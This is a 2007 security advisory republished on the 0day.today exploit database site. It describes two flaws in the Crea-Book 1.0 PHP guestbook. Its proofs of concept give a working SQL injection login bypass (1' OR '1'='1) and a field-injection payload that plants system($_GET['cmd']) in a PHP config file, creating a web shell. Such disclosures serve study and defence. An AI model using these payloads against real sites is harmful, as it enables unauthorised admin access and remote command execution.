0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution
===================================================================== Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution ===================================================================== /=======================================\ | Advisory :: Crea-Book <= 1.0 | +=======================================+---------------------------------------------------------------\ | | | Type : Guestbook | | Vuln. found : Admin Access Bypass, DB information Disclosure & Code Execution Weakness | | Conditions : magic_quotes_gpc = Off | | Risk level : High | | | +-------------------------------------------------------------------------------------------------------+ | | | Program audited by : Xst3nZ <xst3nz@gmail.com> [fr/en] | | Date : 2007-04-10 | | Last update : 2007-04-10 | | | +-------------------------------------------------------------------------------------------------------+ | Summary : 0] Description | | 1] Vuln#1 : Administrative Access Bypass using basic SQL injection | | 2] Vuln#2 : PHP Code Execution Weakness | | 3] Links & Documentation | \-------------------------------------------------------------------------------------------------------/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <0> DESCRIPTION =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This script is old but analysing it is a good way to understand some classic security holes in web applications. It's just a good and fast training. Let's g0 ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <1> VULNERABILITY #1 : ADMINISTRATIVE ACCESS BYPASS USING BASIC SQL INJECTION { Concerned file : admin/admin.php } { Cond: magic_quotes_gpc=Off } =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= If we open the file 'admin/admin.php', we can see that the following code is executed after the submission of the login authentification form : +--------8<-------- | // [...] line 8 | $sql="Select * from $table2 where pseudo='$pseudo' and passe='$passe'"; | // By the way, we can notice that the script works only if register_globals=On | $res=mysql_query($sql); | $nb=mysql_num_rows($res); | if ($nb>0) | { | // Login OK [...] | } | else | header("Location: index.php?erreur=2"); | // line 208 (EOF) +--------8<-------- In fact, the variables called $pseudo and $passe aren't sanitized and so, it is possible to bypass easily the authentification by using a basic SQL injection (see [1]). Nevertheless, single quotes must be used in this injection. Therefore, the magic_quote_gpc parameter must be disabled (Off) in the php.ini configuration file. +---->> Vuln. #1 Pro0f of Concept <<-------- | | - Go to : http://www.victim.com/[install_directory]/admin/admin.php | - Type the following string in the two fields : | | Pseudo (login) : evil | | Mot de passe (password) : 1' OR '1'='1 | - If magic_quotes_gpc=Off, you are now logged as admin. So, you have access to the control panel. | - Let's go to the section called 'Configurer le script' (configure the script). In this page, you can see | all the different informations required to connect to the MySQL server (DataBase Information Disclosure) | +-------------------------------------------// =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= <2> VULNERABILITY #2 : PHP CODE EXECUTION WEAKNESS { Concerned file : admin/configurer2.php } { Cond: magic_quotes_gpc=Off, admin access OK } =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The file 'admin/configurer2.php', which is used when the configuration form is submitted, contains the following code : +--------8<-------- | // [...] line 95 | $fichier = fopen("../config.inc.php3","w+") OR die ("...");; | fwrite($fichier, "<?php\n") or die ("..."); | fwrite($fichier, "// Infos de connexion ? la base de donnees\n\n$"); | fwrite($fichier, "bddserver = \"$bddserver\";\n$"); | // [...] | fwrite($fichier, "mess_fin = \"$mess_fin\";\n"); | fwrite($fichier, "?>"); | fclose($fichier); | // line 125 +--------8<-------- So, all the information which are typed in the form are written in a PHP file called 'config.inc.php3' without any verification before. Consequently, a malicious person which have an admin access (easy with the vuln #1) can put what she wants in the file in question (only if magic_quotes_gpc=Off because double quotes are used). Let's see an example in the next PoC : +---->> Vuln. #2 Pro0f of Concept <<-------- | | - Log in as admin on 'admin/admin.php' (see Vuln. #1 PoC). | - Go to 'admin/configurer.php'. | - Type the following string in one of the fields : value"; [Malicious PHP code]; $nothing=" | Example with the fields 'Fond de la page' (background color) : #FFFFFF"; system($_GET['cmd']); $nothing=" | that gives : $fond = "#FFFFFF"; system($_GET['cmd']); $nothing=""; | +-------------------------------------------// Note : the file 'install/index.php' isn't deleted after the installation and it contains the same configuration form. But, database information (login, password, DB name, server name) are required to write data into the PHP file... // [EOF] Xst3nZ # 0day.today [2024-11-15] #